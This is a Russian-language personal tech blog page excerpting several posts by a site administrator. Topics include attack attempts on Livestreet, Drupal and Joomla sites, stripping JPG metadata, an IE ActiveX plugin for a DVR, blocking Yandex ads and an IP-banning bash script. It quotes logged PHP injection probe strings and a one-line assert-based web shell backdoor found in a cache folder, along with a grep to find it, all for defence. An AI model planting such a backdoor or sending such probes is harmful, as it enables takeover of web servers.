Рейтинг
0.00
avatar

WEB

Подробнее ↓

ЗАДАЛБАЛ МУДАК die(pi()*42);

WEB
Выкладываю список IP адресов говнюков которые ломятся в дешманские уязвимости движков Livestreet, Drupal, joomla, и т.п.
Значит суть заключается в инъекции эксплоита в определённый файл уязвимого сайта и дальше гады делают что хотят. Но неее…
В следующей статье выложу IP адреса уродов ломающих движки сайтов и их прокси IP адреса.

Вобщем список комманд которые пытаются впихнуть.

'accept' => 'die(pi()*42);',
'catch' => 'assert',
'catch' => 'die(pi()*42);',
'ch' => '1',
'ddd' => '',
'except' => 'assert',
'except' => 'die(pi()*42);',
'internal' => 'assert',
'internal' => 'die(pi()*42);',
'lock' => 'assert',
'lock' => 'die(pi()*42);',
'm' => '[email protected]:0:1',
Читать дальше

массово удаляю метаданные JPG в Linux

WEB
JPG методанные Exif это

палево

. Значит отовсюду ищем и трём.
Ставим пакет ImageMagick
топаем в нужную папрку cd /home/srv например и бомбим
find -name "*.jpg" -print0 | xargs -0 mogrify -strip
или если это в одной папке и их мало
ls -1 *.jpg | xargs -0 mogrify -strip

И тоже самое для регистра JPG

Старая уязвимость assert(stripslashes

WEB
В старом движке Livestreet нашёл давнюю уязвимость которая откуда-то взялаь и очень давно лежала в папке cache.
Но какой-то злоумышленник умудрился ей воспользоваться!
Выглядит как обычный php файл с содержанием типа

<?php extract($_REQUEST) && @assert(stripslashes($not)) && exit;


для поиска остальных фалов с подобным кодом использую команду
grep -r "assert(stripslashes" /srv/www/


Кстати из-за этой уязвимости начали находиться ЭЛЬФЫ (ELF).
В памяти сидят то удаляем их и снимаем процесс

СКАЧАТЬ IE_Plugins.exe ACTIVE X

WEB
ЗАДАЛБАЛСЯ В ИНТЕРНЕТЕ ИСКАТЬ ПЛАГИН АКТИВ ИКС(IE_Plugins.exe ACTIVE X) для моего регистратора,
так как регистратор китайский и ПО у китайских DVR и IP камер одинаково ущёрбное и работает только под INTERNET EXPLORER!
Плагин для интернет эксплорера active x ie plugin for dvr registrator
Читать дальше

Убрать рекламу Яндекс Директ с браузера

WEB
Рекламу Яндекс директ суют куда угодно, например сверху висит банер! Ужас, даже сам яндекс в новостях, погоде, почте мешает просмотру контента, пожаловаться на рекламу можно, но яндексу похрену. Или плати за отключение навязанной рекламы. Директ заААА всё своим рекламным контентом. Другие популярные в поиске сайты- такая же помойка с яндекс директом как и этот. Видите рекламу яндекса сверху? Надеюсь в последний раз) Она исчезнет после дальнейших действий.
Никакие блокировщики блягодаря специальной баге не блокируют яндекс Директ! Особенно не сработает на 100% и на самом браузере от Яндекс.
Вобщем реклама везде! Это очень бесило!
Наконец-то в хроме( и фаерфоксе и частично яндекс браузере) удалось удалить ЭТОТ ЗЛОВРЕД на рас-два.
Читать дальше

Простой bash скрипт блокировки ботнета, взлома ssh и перебор портов

WEB
Бесконечное количество хацкеров пытающихся получить доступ к серваку?
Ломится на сервак БОТНЕТ?

Что делать?

Первым делом менять стандартные порты управления, фтп сервера и тельнет(лучше не использовать вапще) например 22 на 6622 или 222 и так далее.
Запретить доступ к нужным Вам портам через фаервол, разрешить только с определённых известных Вам ip.
А всех остальных хацкеров банить!
Пример ламерского скрипта под OPENSUSE 42 который ждёт пакет на определённый порт, логирует, парсит, банит!
Собирает массив из 100 записей после перезапускает фаервол чтобы обнулить список. 100 можно поменять на 1000 но главное не переборщить.
В скрипте удалить ненужные порты или заменить!
ВАШи.АЙПИ.АДРЕСа.- поменять! Если он один то удалить!
Читать дальше